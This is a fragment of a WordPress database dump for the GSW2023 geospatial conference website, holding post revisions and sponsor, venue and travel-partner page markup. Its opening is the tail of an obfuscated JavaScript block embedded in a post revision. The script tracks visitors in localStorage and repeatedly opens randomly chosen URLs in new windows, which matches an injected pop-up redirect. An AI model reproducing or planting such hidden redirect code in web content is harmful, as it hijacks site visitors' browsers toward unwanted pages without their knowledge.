_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Stephen Fai','','inherit','closed','closed','','3916-autosave-v1','','','2023-09-11 11:18:07','2023-09-11 11:18:07','',3916,'https://gsw2023.com/?p=5475',0,'revision','',0),
(5476,1,'2023-09-16 22:41:12','2023-09-16 14:14:40','','Best Workshop Paper Award','','publish','closed','closed','','best-workshop-paper-award','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5476',38,'nav_menu_item','',0),
(5477,1,'2023-09-16 22:41:12','2023-09-16 14:14:40','','Best presentation award GSW2023','','publish','closed','closed','','best-presentation-award-gsw2023','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5477',39,'nav_menu_item','',0),
(5478,1,'2023-09-16 14:34:13','2023-09-16 14:34:13','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"]<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<p><a href=\"https://gsw2023.com/wp-content/uploads/2023/09/The Best.pdf\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/09/best.png\" alt=\"\" width=\"487\" height=\"180\" /></a><h4 style=\"text-align: center;\">ISPRS GSW2023 Best Workshop Paper Award</h4></p>\n[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" 